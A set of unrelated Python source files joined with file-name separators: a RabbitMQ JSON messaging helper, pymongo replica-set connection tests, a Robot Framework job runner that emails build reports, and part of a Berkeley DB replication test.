def __init__(self, rabbit_mq_client, topic):
super(RabbitMQJsonSender, self).__init__()
self._rabbit_mq_client = rabbit_mq_client
self._topic = topic
def send(self, message):
try:
json_message = json.dumps(message)
except Exception as e:
self.logger.debug('JSON serialization failed: {}. Message: {}'.format(e, message))
return
self._rabbit_mq_client.send(topic=self._topic,
message=json_message)
class RabbitMQJsonReceiver(Logging):
def __init__(self, rabbit_mq_client):
super(RabbitMQJsonReceiver, self).__init__()
self._rabbit_mq_client = rabbit_mq_client
def subscribe(self, topic, handler):
self._rabbit_mq_client.subscribe(topic, self._wrapped_handler(handler))
self.logger.debug('Subscribed to topic {}'.format(topic))
@staticmethod
def _wrapped_handler(actual_handler):
# noinspection PyUnusedLocal
def handle(ch, method, properties, body):
message = json.loads(body)
return actual_handler(message)
return handle
|
test_replica_set_connection.py
|
# Copyright 2011-2012 10gen, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the replica_set_connection module."""
import copy
import datetime
import os
import signal
import socket
import sys
import time
import thread
import traceback
import unittest
sys.path[0:0] = [""]
from nose.plugins.skip import SkipTest
from bson.son import SON
from bson.tz_util import utc
from pymongo.connection import Connection
from pymongo.read_preferences import ReadPreference
from pymongo.replica_set_connection import ReplicaSetConnection
from pymongo.replica_set_connection import _partition_node
from pymongo.database import Database
from pymongo.pool import SocketInfo
from pymongo.errors import (AutoReconnect,
ConfigurationError,
ConnectionFailure,
InvalidName,
OperationFailure)
from test import version
from test.utils import delay, assertReadFrom, assertReadFromAll, read_from_which_host
host = os.environ.get("DB_IP", 'localhost')
port = int(os.environ.get("DB_PORT", 27017))
pair = '%s:%d' % (host, port)
class TestReplicaSetConnectionAgainstStandalone(unittest.TestCase):
"""This is a funny beast -- we want to run tests for ReplicaSetConnection
but only if the database at DB_IP and DB_PORT is a standalone.
"""
def setUp(self):
conn = Connection(pair)
response = conn.admin.command('ismaster')
if 'setName' in response:
raise SkipTest("Connected to a replica set, not a standalone mongod")
def test_connect(self):
self.assertRaises(ConfigurationError, ReplicaSetConnection,
pair, replicaSet='anything',
connectTimeoutMS=600)
class TestConnectionReplicaSetBase(unittest.TestCase):
def setUp(self):
conn = Connection(pair)
response = conn.admin.command('ismaster')
if 'setName' in response:
self.name = str(response['setName'])
self.w = len(response['hosts'])
self.hosts = set([_partition_node(h)
for h in response["hosts"]])
self.arbiters = set([_partition_node(h)
for h in response.get("arbiters", [])])
repl_set_status = conn.admin.command('replSetGetStatus')
primary_info = [
m for m in repl_set_status['members']
if m['stateStr'] == 'PRIMARY'
][0]
self.primary = _partition_node(primary_info['name'])
self.secondaries = [
_partition_node(m['name']) for m in repl_set_status['members']
if m['stateStr'] == 'SECONDARY'
]
else:
raise SkipTest("Not connected to a replica set")
def _get_connection(self, **kwargs):
return ReplicaSetConnection(pair,
replicaSet=self.name,
**kwargs)
class TestConnection(TestConnectionReplicaSetBase):
def test_connect(self):
self.assertRaises(ConnectionFailure, ReplicaSetConnection,
"somedomainthatdoesntexist.org:27017",
replicaSet=self.name,
connectTimeoutMS=600)
self.assertRaises(ConfigurationError, ReplicaSetConnection,
pair, replicaSet='fdlksjfdslkjfd')
self.assertTrue(ReplicaSetConnection(pair, replicaSet=self.name))
def test_repr(self):
connection = self._get_connection()
self.assertEqual(repr(connection),
"ReplicaSetConnection(%r)" % (["%s:%d" % n
for n in
self.hosts],))
def test_properties(self):
c = ReplicaSetConnection(pair, replicaSet=self.name)
c.admin.command('ping')
self.assertEqual(c.primary, self.primary)
self.assertEqual(c.hosts, self.hosts)
self.assertEqual(c.arbiters, self.arbiters)
self.assertEqual(c.max_pool_size, 10)
self.assertEqual(c.document_class, dict)
self.assertEqual(c.tz_aware, False)
# Make sure RSC's properties are copied to Database and Collection
for obj in c, c.pymongo_test, c.pymongo_test.test:
self.assertEqual(obj.read_preference, ReadPreference.PRIMARY)
self.assertEqual(obj.tag_sets, [{}])
self.assertEqual(obj.secondary_acceptable_latency_ms, 15)
self.assertEqual(obj.slave_okay, False)
self.assertEqual(obj.safe, False)
cursor = c.pymongo_test.test.find()
self.assertEqual(
ReadPreference.PRIMARY, cursor._Cursor__read_preference)
self.assertEqual([{}], cursor._Cursor__tag_sets)
self.assertEqual(15, cursor._Cursor__secondary_acceptable_latency_ms)
self.assertEqual(False, cursor._Cursor__slave_okay)
c.close()
tag_sets = [{'dc': 'la', 'rack': '2'}, {'foo': 'bar'}]
c = ReplicaSetConnection(pair, replicaSet=self.name, max_pool_size=25,
document_class=SON, tz_aware=True,
slaveOk=False, safe=True,
read_preference=ReadPreference.SECONDARY,
tag_sets=copy.deepcopy(tag_sets),
secondary_acceptable_latency_ms=77)
c.admin.command('ping')
self.assertEqual(c.primary, self.primary)
self.assertEqual(c.hosts, self.hosts)
self.assertEqual(c.arbiters, self.arbiters)
self.assertEqual(c.max_pool_size, 25)
self.assertEqual(c.document_class, SON)
self.assertEqual(c.tz_aware, True)
for obj in c, c.pymongo_test, c.pymongo_test.test:
self.assertEqual(obj.read_preference, ReadPreference.SECONDARY)
self.assertEqual(obj.tag_sets, tag_sets)
self.assertEqual(obj.secondary_acceptable_latency_ms, 77)
self.assertEqual(obj.slave_okay, False)
self.assertEqual(obj.safe, True)
cursor = c.pymongo_test.test.find()
self.assertEqual(
ReadPreference.SECONDARY, cursor._Cursor__read_preference)
self.assertEqual(tag_sets, cursor._Cursor__tag_sets)
self.assertEqual(77, cursor._Cursor__secondary_acceptable_latency_ms)
self.assertEqual(False, cursor._Cursor__slave_okay)
cursor = c.pymongo_test.test.find(
read_preference=ReadPreference.NEAREST,
tag_sets=[{'dc':'ny'}, {}],
secondary_acceptable_latency_ms=123)
self.assertEqual(
ReadPreference.NEAREST, cursor._Cursor__read_preference)
self.assertEqual([{'dc':'ny'}, {}], cursor._Cursor__tag_sets)
self.assertEqual(123, cursor._Cursor__secondary_acceptable_latency_ms)
self.assertEqual(False, cursor._Cursor__slave_okay)
if version.at_least(c, (1, 7, 4)):
self.assertEqual(c.max_bson_size, 16777216)
else:
self.assertEqual(c.max_bson_size, 4194304)
c.close()
def test_get_db(self):
connection = self._get_connection()
def make_db(base, name):
return base[name]
self.assertRaises(InvalidName, make_db, connection, "")
self.assertRaises(InvalidName, make_db, connection, "te$t")
self.assertRaises(InvalidName, make_db, connection, "te.t")
self.assertRaises(InvalidName, make_db, connection, "te\\t")
self.assertRaises(InvalidName, make_db, connection, "te/t")
self.assertRaises(InvalidName, make_db, connection, "te st")
self.assertTrue(isinstance(connection.test, Database))
self.assertEqual(connection.test, connection["test"])
self.assertEqual(connection.test, Database(connection, "test"))
connection.close()
def test_auto_reconnect_exception_when_read_preference_is_secondary(self):
c = self._get_connection()
db = c.pymongo_test
def raise_socket_error(*args, **kwargs):
raise socket.error
old_sendall = socket.socket.sendall
socket.socket.sendall = raise_socket_error
try:
cursor = db.test.find(read_preference=ReadPreference.SECONDARY)
self.assertRaises(AutoReconnect, cursor.next)
finally:
socket.socket.sendall = old_sendall
def test_operations(self):
c = self._get_connection()
# Check explicitly for a case we've commonly hit in tests:
# a replica set is started with a tiny oplog, a previous
# test does a big insert that leaves the secondaries
# permanently "RECOVERING", and our insert(w=self.w) hangs
# forever.
rs_status = c.admin.command('replSetGetStatus')
members = rs_status['members']
self.assertFalse(
[m for m in members if m['stateStr'] == 'RECOVERING'],
"Replica set is recovering, try a larger oplogSize next time"
)
db = c.pymongo_test
db.test.remove({}, safe=True)
self.assertEqual(0, db.test.count())
db.test.insert({'foo': 'x'}, safe=True, w=self.w, wtimeout=10000)
self.assertEqual(1, db.test.count())
cursor = db.test.find()
doc = cursor.next()
self.assertEqual('x', doc['foo'])
# Ensure we read from the primary
self.assertEqual(c.primary, cursor._Cursor__connection_id)
cursor = db.test.find(read_preference=ReadPreference.SECONDARY)
doc = cursor.next()
self.assertEqual('x', doc['foo'])
# Ensure we didn't read from the primary
self.assertTrue(cursor._Cursor__connection_id in c.secondaries)
self.assertEqual(1, db.test.count())
db.test.remove({}, safe=True)
self.assertEqual(0, db.test.count())
db.test.drop()
c.close()
def test_database_names(self):
connection = self._get_connection()
connection.pymongo_test.test.save({"dummy": u"object"})
connection.pymongo_test_mike.test.save({"dummy": u"object"})
dbs = connection.database_names()
self.assertTrue("pymongo_test" in dbs)
self.assertTrue("pymongo_test_mike" in dbs)
connection.close()
def test_drop_database(self):
connection = self._get_connection()
self.assertRaises(TypeError, connection.drop_database, 5)
self.assertRaises(TypeError, connection.drop_database, None)
connection.pymongo_test.test.save({"dummy": u"object"})
dbs = connection.database_names()
self.assertTrue("pymongo_test" in dbs)
connection.drop_database("pymongo_test")
dbs = connection.database_names()
self.assertTrue("pymongo_test" not in dbs)
connection.pymongo_test.test.save({"dummy": u"object"})
dbs = connection.database_names()
self.assertTrue("pymongo_test" in dbs)
connection.drop_database(connection.pymongo_test)
dbs = connection.database_names()
self.assertTrue("pymongo_test" not in dbs)
connection.close()
def test_copy_db(self):
c = self._get_connection()
self.assertTrue(c.in_request())
self.assertRaises(TypeError, c.copy_database, 4, "foo")
self.assertRaises(TypeError, c.copy_database, "foo", 4)
self.assertRaises(InvalidName, c.copy_database, "foo", "$foo")
c.pymongo_test.test.drop()
c.drop_database("pymongo_test1")
c.drop_database("pymongo_test2")
c.pymongo_test.test.insert({"foo": "bar"})
self.assertFalse("pymongo_test1" in c.database_names())
self.assertFalse("pymongo_test2" in c.database_names())
c.copy_database("pymongo_test", "pymongo_test1")
# copy_database() didn't accidentally end the request
self.assertTrue(c.in_request())
self.assertTrue("pymongo_test1" in c.database_names())
self.assertEqual("bar", c.pymongo_test1.test.find_one()["foo"])
c.end_request()
self.assertFalse(c.in_request())
c.copy_database("pymongo_test", "pymongo_test2", pair)
# copy_database() didn't accidentally restart the request
self.assertFalse(c.in_request())
time.sleep(1)
self.assertTrue("pymongo_test2" in c.database_names())
self.assertEqual("bar", c.pymongo_test2.test.find_one()["foo"])
if version.at_least(c, (1, 3, 3, 1)):
c.drop_database("pymongo_test1")
c.pymongo_test.add_user("mike", "password")
self.assertRaises(OperationFailure, c.copy_database,
"pymongo_test", "pymongo_test1",
username="foo", password="bar")
self.assertFalse("pymongo_test1" in c.database_names())
self.assertRaises(OperationFailure, c.copy_database,
"pymongo_test", "pymongo_test1",
username="mike", password="bar")
self.assertFalse("pymongo_test1" in c.database_names())
c.copy_database("pymongo_test", "pymongo_test1",
username="mike", password="password")
self.assertTrue("pymongo_test1" in c.database_names())
time.sleep(2)
self.assertEqual("bar", c.pymongo_test1.test.find_one()["foo"])
c.close()
def test_iteration(self):
connection = self._get_connection()
def iterate():
[a for a in connection]
self.assertRaises(TypeError, iterate)
connection.close()
def test_disconnect(self):
c = self._get_connection()
coll = c.foo.bar
c.disconnect()
c.disconnect()
coll.count()
c.disconnect()
c.disconnect()
coll.count()
def test_fork(self):
"""Test using a connection before and after a fork.
"""
if sys.platform == "win32":
raise SkipTest("Can't fork on Windows")
try:
from multiprocessing import Process, Pipe
except ImportError:
raise SkipTest("No multiprocessing module")
db = self._get_connection().pymongo_test
# Failure occurs if the connection is used before the fork
db.test.find_one()
#db.connection.end_request()
def loop(pipe):
while True:
try:
db.test.insert({"a": "b"}, safe=True)
for _ in db.test.find():
pass
except:
traceback.print_exc()
pipe.send(True)
os._exit(1)
cp1, cc1 = Pipe()
cp2, cc2 = Pipe()
p1 = Process(target=loop, args=(cc1,))
p2 = Process(target=loop, args=(cc2,))
p1.start()
p2.start()
p1.join(1)
p2.join(1)
p1.terminate()
p2.terminate()
p1.join()
p2.join()
cc1.close()
cc2.close()
# recv will only have data if the subprocess failed
try:
cp1.recv()
self.fail()
except EOFError:
pass
try:
cp2.recv()
self.fail()
except EOFError:
pass
db.connection.close()
def test_document_class(self):
c = self._get_connection()
db = c.pymongo_test
db.test.insert({"x": 1})
self.assertEqual(dict, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), dict))
self.assertFalse(isinstance(db.test.find_one(), SON))
c.document_class = SON
self.assertEqual(SON, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), SON))
self.assertFalse(isinstance(db.test.find_one(as_class=dict), SON))
c.close()
c = self._get_connection(document_class=SON)
db = c.pymongo_test
self.assertEqual(SON, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), SON))
self.assertFalse(isinstance(db.test.find_one(as_class=dict), SON))
c.document_class = dict
self.assertEqual(dict, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), dict))
self.assertFalse(isinstance(db.test.find_one(), SON))
c.close()
def test_network_timeout(self):
no_timeout = self._get_connection()
timeout_sec = 1
timeout = self._get_connection(socketTimeoutMS=timeout_sec*1000)
no_timeout.pymongo_test.drop_collection("test")
no_timeout.pymongo_test.test.insert({"x": 1}, safe=True)
# A $where clause that takes a second longer than the timeout
where_func = delay(1 + timeout_sec)
def get_x(db):
doc = db.test.find().where(where_func).next()
return doc["x"]
self.assertEqual(1, get_x(no_timeout.pymongo_test))
self.assertRaises(ConnectionFailure, get_x, timeout.pymongo_test)
def get_x_timeout(db, t):
doc = db.test.find(network_timeout=t).where(where_func).next()
return doc["x"]
self.assertEqual(1, get_x_timeout(timeout.pymongo_test, None))
self.assertRaises(ConnectionFailure, get_x_timeout,
no_timeout.pymongo_test, 0.1)
no_timeout.close()
timeout.close()
def test_tz_aware(self):
self.assertRaises(ConfigurationError, ReplicaSetConnection,
tz_aware='foo', replicaSet=self.name)
aware = self._get_connection(tz_aware=True)
naive = self._get_connection()
aware.pymongo_test.drop_collection("test")
now = datetime.datetime.utcnow()
aware.pymongo_test.test.insert({"x": now}, safe=True)
time.sleep(1)
self.assertEqual(None, naive.pymongo_test.test.find_one()["x"].tzinfo)
self.assertEqual(utc, aware.pymongo_test.test.find_one()["x"].tzinfo)
self.assertEqual(
aware.pymongo_test.test.find_one()["x"].replace(tzinfo=None),
naive.pymongo_test.test.find_one()["x"])
def test_ipv6(self):
try:
connection = ReplicaSetConnection("[::1]:%d" % (port,),
replicaSet=self.name)
except:
# Either mongod was started without --ipv6
# or the OS doesn't support it (or both).
raise SkipTest("No IPv6")
# Try a few simple things
connection = ReplicaSetConnection("mongodb://[::1]:%d" % (port,),
replicaSet=self.name)
connection = ReplicaSetConnection("mongodb://[::1]:%d/?safe=true;"
"replicaSet=%s" % (port, self.name))
connection = ReplicaSetConnection("[::1]:%d,localhost:"
"%d" % (port, port),
replicaSet=self.name)
connection = ReplicaSetConnection("localhost:%d,[::1]:"
"%d" % (port, port),
replicaSet=self.name)
connection.pymongo_test.test.save({"dummy": u"object"})
connection.pymongo_test_bernie.test.save({"dummy": u"object"})
dbs = connection.database_names()
self.assertTrue("pymongo_test" in dbs)
self.assertTrue("pymongo_test_bernie" in dbs)
connection.close()
def _test_kill_cursor_explicit(self, read_pref):
c = self._get_connection(read_preference=read_pref)
db = c.pymongo_test
db.drop_collection("test")
test = db.test
test.insert([{"i": i} for i in range(20)], w=1 + len(c.secondaries))
# Partially evaluate cursor so it's left alive, then kill it
cursor = test.find().batch_size(10)
cursor.next()
self.assertNotEqual(0, cursor.cursor_id)
connection_id = cursor._Cursor__connection_id
writer = c._ReplicaSetConnection__writer
if read_pref == ReadPreference.PRIMARY:
msg = "Expected cursor's connection_id to be %s, got %s" % (
writer, connection_id)
self.assertEqual(connection_id, writer, msg)
else:
self.assertNotEqual(connection_id, writer,
"Expected cursor's connection_id not to be primary")
cursor_id = cursor.cursor_id
# Cursor dead on server - trigger a getMore on the same cursor_id and
# check that the server returns an error.
cursor2 = cursor.clone()
cursor2._Cursor__id = cursor_id
if (sys.platform.startswith('java') or
'PyPy' in sys.version):
# Explicitly kill cursor.
cursor.close()
else:
# Implicitly kill it in CPython.
del cursor
self.assertRaises(OperationFailure, lambda: list(cursor2))
def test_kill_cursor_explicit_primary(self):
self._test_kill_cursor_explicit(ReadPreference.PRIMARY)
def test_kill_cursor_explicit_secondary(self):
self._test_kill_cursor_explicit(ReadPreference.SECONDARY)
def test_interrupt_signal(self):
if sys.platform.startswith('java'):
raise SkipTest("Can't test interrupts in Jython")
# Test fix for PYTHON-294 -- make sure Connection closes its
# socket if it gets an interrupt while waiting to recv() from it.
c = self._get_connection()
db = c.pymongo_test
# A $where clause which takes 1.5 sec to execute
where = delay(1.5)
# Need exactly 1 document so find() will execute its $where clause once
db.drop_collection('foo')
db.foo.insert({'_id': 1}, safe=True)
old_signal_handler = None
try:
# Platform-specific hacks for raising a KeyboardInterrupt on the main
# thread while find() is in-progress: On Windows, SIGALRM is unavailable
# so we use a second thread. In our Bamboo setup on Linux, the thread
# technique causes an error in the test at sock.recv():
# TypeError: 'int' object is not callable
# We don't know what causes this in Bamboo, so we hack around it.
if sys.platform == 'win32':
def interrupter():
time.sleep(0.25)
# Raises KeyboardInterrupt in the main thread
thread.interrupt_main()
thread.start_new_thread(interrupter, ())
else:
# Convert SIGALRM to SIGINT -- it's hard to schedule a SIGINT for one
# second in the future, but easy to schedule SIGALRM.
def sigalarm(num, frame):
raise KeyboardInterrupt
old_signal_handler = signal.signal(signal.SIGALRM, sigalarm)
signal.alarm(1)
raised = False
try:
# Will be interrupted by a KeyboardInterrupt.
db.foo.find({'$where': where}).next()
except KeyboardInterrupt:
raised = True
# Can't use self.assertRaises() because it doesn't catch system
# exceptions
self.assertTrue(raised, "Didn't raise expected KeyboardInterrupt")
# Raises AssertionError due to PYTHON-294 -- Mongo's response to the
# previous find() is still waiting to be read on the socket, so the
# request id's don't match.
self.assertEqual(
{'_id': 1},
db.foo.find().next()
)
finally:
if old_signal_handler:
signal.signal(signal.SIGALRM, old_signal_handler)
def test_operation_failure_without_request(self):
# Ensure ReplicaSetConnection doesn't close socket after it gets an
# error response to getLastError. PYTHON-395.
c = self._get_connection(auto_start_request=False)
pool = c._ReplicaSetConnection__members[self.primary].pool
self.assertEqual(1, len(pool.sockets))
old_sock_info = iter(pool.sockets).next()
c.pymongo_test.test.drop()
c.pymongo_test.test.insert({'_id': 'foo'}, safe=True)
self.assertRaises(
OperationFailure,
c.pymongo_test.test.insert, {'_id': 'foo'}, safe=True)
self.assertEqual(1, len(pool.sockets))
new_sock_info = iter(pool.sockets).next()
self.assertEqual(old_sock_info, new_sock_info)
c.close()
def test_operation_failure_with_request(self):
# Ensure ReplicaSetConnection doesn't close socket after it gets an
# error response to getLastError. PYTHON-395.
c = self._get_connection(auto_start_request=True)
c.pymongo_test.test.find_one()
pool = c._ReplicaSetConnection__members[self.primary].pool
# Connection has reserved a socket for this thread
self.assertTrue(isinstance(pool._get_request_state(), SocketInfo))
old_sock_info = pool._get_request_state()
c.pymongo_test.test.drop()
c.pymongo_test.test.insert({'_id': 'foo'}, safe=True)
self.assertRaises(
OperationFailure,
c.pymongo_test.test.insert, {'_id': 'foo'}, safe=True)
# OperationFailure doesn't affect the request socket
self.assertEqual(old_sock_info, pool._get_request_state())
c.close()
def test_auto_start_request(self):
for bad_horrible_value in (None, 5, 'hi!'):
self.assertRaises(
(TypeError, ConfigurationError),
lambda: self._get_connection(auto_start_request=bad_horrible_value)
)
# auto_start_request should default to True
conn = self._get_connection()
pools = [mongo.pool for mongo in
conn._ReplicaSetConnection__members.values()]
self.assertTrue(conn.auto_start_request)
self.assertTrue(conn.in_request())
# Trigger the RSC to actually start a request
conn.test.test.find_one()
for pool in pools:
self.assertTrue(pool.in_request())
conn.end_request()
self.assertFalse(conn.in_request())
for pool in pools:
self.assertFalse(pool.in_request())
conn.start_request()
self.assertTrue(conn.in_request())
conn.close()
conn = self._get_connection(auto_start_request=False)
self.assertFalse(conn.in_request())
conn.start_request()
self.assertTrue(conn.in_request())
conn.end_request()
self.assertFalse(conn.in_request())
conn.close()
def test_schedule_refresh(self):
# Monitor thread starts waiting for _refresh_interval, 30 seconds
conn = self._get_connection()
# Reconnect if necessary
conn.pymongo_test.test.find_one()
secondaries = conn.secondaries
for secondary in secondaries:
conn._ReplicaSetConnection__members[secondary].up = False
conn._ReplicaSetConnection__members[conn.primary].up = False
# Wake up monitor thread
conn._ReplicaSetConnection__schedule_refresh()
# Refresh interval is 30 seconds; scheduling a refresh tells the
# monitor thread / greenlet to start a refresh now. We still need to
# sleep a few seconds for it to complete.
time.sleep(5)
for secondary in secondaries:
self.assertTrue(conn._ReplicaSetConnection__members[secondary].up,
"ReplicaSetConnection didn't detect secondary is up")
self.assertTrue(conn._ReplicaSetConnection__members[conn.primary].up,
"ReplicaSetConnection didn't detect primary is up")
conn.close()
def test_pinned_member(self):
latency = 1000 * 1000
conn = self._get_connection(
auto_start_request=False, secondary_acceptable_latency_ms=latency)
host = read_from_which_host(conn, ReadPreference.SECONDARY)
self.assertTrue(host in conn.secondaries)
# No pinning since we're not in a request
assertReadFromAll(
self, conn, conn.secondaries,
ReadPreference.SECONDARY, None, latency)
assertReadFromAll(
self, conn, list(conn.secondaries) + [conn.primary],
ReadPreference.NEAREST, None, latency)
conn.start_request()
host = read_from_which_host(conn, ReadPreference.SECONDARY)
self.assertTrue(host in conn.secondaries)
assertReadFrom(self, conn, host, ReadPreference.SECONDARY)
# Repin
primary = read_from_which_host(conn, ReadPreference.PRIMARY)
self.assertEqual(conn.primary, primary)
assertReadFrom(self, conn, primary, ReadPreference.NEAREST)
# Repin again
host = read_from_which_host(conn, ReadPreference.SECONDARY)
self.assertTrue(host in conn.secondaries)
assertReadFrom(self, conn, host, ReadPreference.SECONDARY)
# Unpin
conn.end_request()
assertReadFromAll(
self, conn, list(conn.secondaries) + [conn.primary],
ReadPreference.NEAREST, None, latency)
if __name__ == "__main__":
unittest.main()
|
run.py
|
# -*- coding: utf-8 -*-
__author__ = "苦叶子"
"""
WeChat official account: 开源优测 (Open Source Quality Testing)
Email: lymking@foxmail.com
"""
import sys
import codecs
from flask import current_app, session, url_for
from flask_mail import Mail, Message
import threading
from threading import Thread
import multiprocessing
import time
import smtplib
from email.mime.text import MIMEText
from email.header import Header
import json
from robot.api import TestSuiteBuilder, ResultWriter, ExecutionResult
from utils.file import exists_path, make_nod, write_file, read_file, mk_dirs
def robot_job(app, name, username):
with app.app_context():
project = app.config["AUTO_HOME"] + "/workspace/%s/%s" % (username, name)
output = app.config["AUTO_HOME"] + "/jobs/%s/%s" % (username, name)
if not is_run(app, project):
p = multiprocessing.Process(target=robot_run, args=(username, name, project, output))
p.start()
app.config["AUTO_ROBOT"].append({"name": project, "process": p})
print("-+" * 15)
print(app.config["AUTO_ROBOT"])
print("-+" * 15)
def robot_run(username, name, project, output):
if not exists_path(output):
mk_dirs(output)
suite = TestSuiteBuilder().build(project)
(out, index) = reset_next_build_numb(output)
result = suite.run(output_directory=out,
output=out + "/output.xml",
debugfile=out + "/debug.txt",
loglevel="TRACE")
# reset_last_status(result, output, index)
# Report and xUnit files can be generated based on the result object.
# ResultWriter(result).write_results(report=out + '/report.html', log=out + '/log.html')
detail_result = ExecutionResult(out + "/output.xml")
# detail_result.save(out + "/output_new.xml")
reset_last_status(detail_result, output, index)
# Report and xUnit files can be generated based on the result object.
ResultWriter(detail_result).write_results(report=out + '/report.html', log=out + '/log.html')
send_robot_report(username, name, index, detail_result, out)
def reset_next_build_numb(output):
next_build_number = output + "/nextBuildNumber"
index = 1
data = "%d" % (index + 1)
if not exists_path(next_build_number):
make_nod(next_build_number)
else:
index = int(read_file(next_build_number)["data"])
data = "%d" % (index + 1)
write_file(next_build_number, data)
out = output + "/%d" % index
if not exists_path(output):
mk_dirs(output)
return (out, index)
def reset_last_status(result, output, index):
stats = result.statistics
fail = stats.total.critical.failed
last_fail = output + "/lastFail"
last_passed = output + "/lastPassed"
data = "%d" % index
if fail != 0:
if not exists_path(last_fail):
make_nod(last_fail)
write_file(last_fail, data)
else:
if not exists_path(last_passed):
make_nod(last_passed)
write_file(last_passed, data)
def remove_robot(app):
lock = threading.Lock()
lock.acquire()
for p in app.config["AUTO_ROBOT"]:
if not p["process"].is_alive():
app.config["AUTO_ROBOT"].remove(p)
break
lock.release()
def stop_robot(app, name):
lock = threading.Lock()
lock.acquire()
for p in app.config["AUTO_ROBOT"]:
if name == p["name"]:
if p["process"].is_alive():
p["process"].terminate()
time.sleep(0.2)
app.config["AUTO_ROBOT"].remove(p)
break
lock.release()
return True
def is_run(app, name):
remove_robot(app)
for p in app.config["AUTO_ROBOT"]:
if name == p["name"]:
return True
return False
def send_robot_report(username, name, task_no, result, output):
app = current_app._get_current_object()
build_msg = "<font color='green'>Success</font>"
if result.statistics.total.critical.failed != 0:
build_msg = "<font color='red'>Failure</font>"
report_url = url_for("routes.q_view_report",
_external=True,
username=username,
project=name,
task=task_no)
msg = MIMEText("""Hello, %s<hr>
Project name: %s<hr>
Build number: %s<hr>
Build status: %s<hr>
Duration: %s ms<hr>
Detailed report: <a href='%s'>%s</a><hr>
Build log: <br>%s<hr><br><br>
(This email was sent automatically; please do not reply.)""" %
(username,
result.statistics.suite.stat.name,
task_no,
build_msg,
result.suite.elapsedtime,
report_url, report_url,
codecs.open(output + "/debug.txt", "r", "utf-8").read().replace("\n", "<br>")
),
"html", "utf-8")
msg["Subject"] = Header("AutoLink notification", "utf-8")
try:
user_path = app.config["AUTO_HOME"] + "/users/%s/config.json" % session["username"]
user_conf = json.load(codecs.open(user_path, 'r', 'utf-8'))
for p in user_conf["data"]:
if p["name"] == name:
if result.statistics.total.critical.failed != 0:
msg["To"] = p["fail_list"]
else:
msg["To"] = p["success_list"]
break
conf_path = app.config["AUTO_HOME"] + "/auto.json"
config = json.load(codecs.open(conf_path, 'r', 'utf-8'))
msg["From"] = config["smtp"]["username"]
if config["smtp"]["ssl"]:
smtp = smtplib.SMTP_SSL()
else:
smtp = smtplib.SMTP()
# Connect to the SMTP server
smtp.connect(config["smtp"]["server"], int(config["smtp"]["port"]))
# Log in
smtp.login(config["smtp"]["username"], config["smtp"]["password"])
# Send the email
smtp.sendmail(msg["From"], msg["To"].split(","), msg.as_string().encode("utf8"))
# Disconnect
smtp.quit()
except Exception as e:
print("邮件发送错误: %s" % e)
class RobotRun(threading.Thread):
def __init__(self, name, output, lock, executor="auto"):
threading.Thread.__init__(self)
self.lock = lock
self.project = name
self.output = output
self.executor = executor
self.suite = None
self.result = None
def run(self):
#lock = threading.Lock()
# self.lock.acquire()
if not exists_path(self.output):
mk_dirs(self.output)
self.suite = TestSuiteBuilder().build(self.project)
(output, index) = self.reset_next_build_numb()
self.setName(output)
self.result = self.suite.run(output_directory=output,
output=output + "/output.xml",
debugfile=output + "/debug.txt",
loglevel="TRACE")
# self.reset_last_status(index)
# Report and xUnit files can be generated based on the result object.
# ResultWriter(self.result).write_results(report=output + '/report.html', log=output + '/log.html')
# self.lock.release()
# Generating log files requires processing the earlier generated output XML.
# ResultWriter(self.output + '/output.xml').write_results()
self.result = ExecutionResult(output + "/output.xml")
self.reset_last_status(index)
# Report and xUnit files can be generated based on the result object.
ResultWriter(self.result).write_results(report=output + '/report.html', log=output + '/log.html')
def reset_next_build_numb(self):
next_build_number = self.output + "/nextBuildNumber"
index = 1
data = "%d" % (index + 1)
if not exists_path(next_build_number):
make_nod(next_build_number)
else:
index = int(read_file(next_build_number)["data"])
data = "%d" % (index + 1)
write_file(next_build_number, data)
output = self.output + "/%d" % index
if not exists_path(output):
mk_dirs(output)
return (output, index)
def reset_last_status(self, index):
stats = self.result.statistics
fail = stats.total.critical.failed
lock = threading.Lock()
lock.acquire()
last_fail = self.output + "/lastFail"
last_passed = self.output + "/lastPassed"
data = "%d" % index
if fail != 0:
if not exists_path(last_fail):
make_nod(last_fail)
write_file(last_fail, data)
else:
if not exists_path(last_passed):
make_nod(last_passed)
write_file(last_passed, data)
lock.release()
|
test_replication.py
|
"""TestCases for distributed transactions.
"""
import os
import time
import unittest
from test_all import db, test_support, have_threads, verbose, \
get_new_environment_path, get_new_database_path
#----------------------------------------------------------------------
class DBReplicationManager(unittest.TestCase):
import sys
if sys.version_info[:3] < (2, 4, 0):
def assertTrue(self, expr, msg=None):
self.failUnless(expr,msg=msg)
def setUp(self) :
self.homeDirMaster = get_new_environment_path()
self.homeDirClient = get_new_environment_path()
self.dbenvMaster = db.DBEnv()
self.dbenvClient = db.DBEnv()
# Must use "DB_THREAD" because the Replication Manager will
# be executed in other threads but will use the same environment.
# http://forums.oracle.com/forums/thread.jspa?threadID=645788&tstart=0
self.dbenvMaster.open(self.homeDirMaster, db.DB_CREATE | db.DB_INIT_TXN
| db.DB_INIT_LOG | db.DB_INIT_MPOOL | db.DB_INIT_LOCK |
db.DB_INIT_REP | db.DB_RECOVER | db.DB_THREAD, 0666)
self.dbenvClient.open(self.homeDirClient, db.DB_CREATE | db.DB_INIT_TXN
| db.DB_INIT_LOG | db.DB_INIT_MPOOL | db.DB_INIT_LOCK |
db.DB_INIT_REP | db.DB_RECOVER | db.DB_THREAD, 0666)
self.confirmed_master=self.client_startupdone=False
def confirmed_master(a,b,c) :
if b==db.DB_EVENT_REP_MASTER :
self.confirmed_master=True
def client_startupdone(a,b,c) :
if b==db.DB_EVENT_REP_STARTUPDONE :
self.client_startupdone=True
self.dbenvMaster.set_event_notify(confirmed_master)
self.dbenvClient.set_event_notify(client_startupdone)
#self.dbenvMaster.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvMaster.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
#self.dbenvClient.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvClient.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
